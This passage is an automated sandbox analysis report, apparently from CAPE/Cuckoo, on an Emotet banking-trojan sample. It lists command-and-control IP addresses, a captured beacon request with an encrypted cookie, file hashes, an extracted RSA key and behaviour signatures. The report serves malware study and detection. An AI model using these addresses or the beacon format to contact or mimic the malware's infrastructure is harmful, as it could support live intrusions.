Y        64.32.70.194     Dominican Republic
Y        200.110.85.138   Ecuador
Y        187.131.137.216  Mexico
Y        174.84.250.37    United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49184 174.84.250.37 443
192.168.35.21 49185 187.131.137.216 50000
192.168.35.21 49187 200.110.85.138 990
192.168.35.21 49186 64.32.70.194 20

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://200.110.85.138:990/
GET / HTTP/1.1
Cookie: 45902=rMhrzCuyL0l2U5eRr1HJU48t5LZnZAWh+8+r5CKdkIyYm9nbNvxHWLpJuDVZEmztQ3pEAbM8Xl8tEBfyTVyTBrwFMJtHoOSfKBPztSWjKHeLSBBi3irgweRf88G4OC6fLzAlu5A3aHOe9gkZ00NORErzSLfwOed8yrc5sZPCCVP9tXKsND0ta8iQzQflZeTURW2pM5IL6kLiO7XNPgYjoYP6WAty0WyLOquDW7EXT2jqN6tfj0QujVSYfu3qaN30+nXivEylJTN73Ce952V0C0Vp2c0Ey8sPI0wMPwXNnemduvNmHJAtnoRvdEk5ka93CGz8k3dfPR1CLV4pcVP3STX2KhTJ309xb/v5/Y9jy6kkZcykxPOvm60K2ODPEugwB+XYhYysNmoatjOiNgiLbvs5azYf3FjlIFJbg3aqCnuyLRvA
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 200.110.85.138:990
Connection: Keep-Alive
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name dafpanes.exe
Associated Filenames
C:\Windows\SysWOW64\dafpanes.exe
File Size 470528 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 656e02696cf6c513ad72c009e9d337b5
SHA1 58273d0d9c7700fa13dc63096b08967ae926db6d
SHA256 f9604051cf7518348b294c2afdc47d786cac4f51d503b26f0731dc7deee72369
CRC32 2345913F
Ssdeep 3072:Ich6OhgjArPuHPhYR/UctWYNqHfkU81o4U5oij9Fk0lNJCqfcWEj6bl13wa0gRUN:/q0X0vwa0PXqWbZR/
ClamAV None
Yara None matched
CAPE Yara None matched
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAL9KRKWqcld40xbUZ6hRh+fPNkgJe7K+
0y1rR0UFqc2SBmnyoR/2Ctd+8MRvU8zri2eNVkVBxCUH1Cthf3AEgRqY2kGva8gJ
Wcqls3j7RztZzqFoL+wM9DNnz/OWuiyPAQIDAQAB
-----END PUBLIC KEY-----
address
Type Extracted Shellcode: 32-bit executable
Size 106496 bytes
Virtual Address 0x140000
Process sPVjc.exe
PID 2932
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 520c420dcffb6a949dd9ea4c10005160
SHA1 0a73f0582cf8dfc9bd20f26c1cdbc7449d3811c5
SHA256 75d8fae05121c13a53701897ab02d34ceb748c9be1acc1f6c66a2056b6e0f33d
CRC32 3F8121CE
Ssdeep 384:VOjqf6OFVXbWe1H5jMm8AtuAhCSs79XidW:VOQVLWe95AUySs7did
Yara None matched
CAPE Yara None matched
Type Emotet Payload: 32-bit executable
Size 78336 bytes
Virtual Address 0x210000
Process sPVjc.exe
PID 2932
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 9365d5fdab6f911e3feb6c08f13c2f1a
SHA1 69a8dbfa79309a0ea3eb76fd91bd308e7240466c
SHA256 4d8278bcf3ed08cc39947ce048a910fab144b6af351d4e8cc67afef20912e85f
CRC32 28633AED
Ssdeep 1536:buYQMf62aE5vnkPb2EfBU53MWGf4gzWQe3OW8QfY+dUZLHrbzmV1ZsAfGWG:ifWbZ5kj2EfG5fMU3NfY+CZLHnzq3Ru
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Type Emotet Payload: 32-bit executable
Size 67396 bytes
Virtual Address 0x210000
Process sPVjc.exe
PID 2932
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 244ab2a893119ebc5ec3036880af12ac
SHA1 bbe8bbeb3386bb3256b9db32f88b29a24233ca83
SHA256 2c9676fd35a727b1be1124bbedfc81c88130231aa33c93dd8a1b920d545ec389
CRC32 86D2A42D
Ssdeep 1536:FcYQMf62aE5vnkPb2EfBU53MWGf4gzWQe3OW8QfY+dUZLHrbzmVO:qfWbZ5kj2EfG5fMU3NfY+CZLHnzqO
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Type Emotet Payload: 32-bit executable
Size 82432 bytes
Virtual Address 0x290000
Process sPVjc.exe
PID 2832
Path C:\Users\user\AppData\Local\Temp\sPVjc.exe
MD5 73017657aafc1365adda93018c921e3d
SHA1 1acd6091e2944db6c6b2441c6f18992bfeb5bd72
SHA256 041cba5cbe5434472390a432cc67b97609571fa6a73eae68e2a1d1ef6238b72c
CRC32 7665716A
Ssdeep 1536:6QoQl90ru2iEFvT4XiYfBunMWSf4AzWQa3OW8oXEudUpLHrbzmpEbIZsAfGWGf:rXl9OnR1UyYfEvoU3VXEuCpLHnzeEbYe
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Sorry! No process dumps.

Processing ( 3.608 seconds )

  • 1.954 CAPE
  • 0.412 BehaviorAnalysis
  • 0.362 Static
  • 0.306 TargetInfo
  • 0.304 Dropped
  • 0.19 TrID
  • 0.034 Deduplicate
  • 0.025 Strings
  • 0.011 NetworkAnalysis
  • 0.006 AnalysisInfo
  • 0.003 config_decoder
  • 0.001 Debug

Signatures ( 0.203 seconds )

  • 0.021 stealth_timeout
  • 0.021 antiav_detectreg
  • 0.015 api_spamming
  • 0.015 decoy_document
  • 0.011 PlugX
  • 0.008 infostealer_ftp
  • 0.007 Doppelganging
  • 0.007 injection_createremotethread
  • 0.007 InjectionCreateRemoteThread
  • 0.006 injection_runpe
  • 0.005 InjectionInterProcess
  • 0.005 InjectionProcessHollowing
  • 0.005 infostealer_im
  • 0.004 antianalysis_detectreg
  • 0.004 antiav_detectfile
  • 0.004 ransomware_files
  • 0.003 mimics_filetime
  • 0.003 antivm_generic_disk
  • 0.003 persistence_autorun
  • 0.003 infostealer_mail
  • 0.003 ransomware_extensions
  • 0.002 bootkit
  • 0.002 stealth_file
  • 0.002 antivm_generic_scsi
  • 0.002 reads_self
  • 0.002 vawtrak_behavior
  • 0.002 virus
  • 0.002 antivm_vbox_keys
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.001 lsass_credential_dumping
  • 0.001 tinba_behavior
  • 0.001 malicious_dynamic_function_loading
  • 0.001 rat_nanocore
  • 0.001 recon_programs
  • 0.001 antivm_generic_services
  • 0.001 antiemu_wine_func
  • 0.001 process_interest
  • 0.001 betabot_behavior
  • 0.001 antivm_vbox_libs
  • 0.001 kibex_behavior
  • 0.001 dynamic_function_loading
  • 0.001 cerber_behavior
  • 0.001 kovter_behavior
  • 0.001 hancitor_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vmware_keys
  • 0.001 antivm_xen_keys
  • 0.001 geodo_banking_trojan
  • 0.001 bot_drive
  • 0.001 modify_proxy
  • 0.001 disables_browser_warn
  • 0.001 recon_fingerprint

Reporting ( 0.031 seconds )

  • 0.031 CompressResults
Task ID 36422
Mongo ID 5c61cea6f284884f69b30d0a
Cuckoo release 1.3-CAPE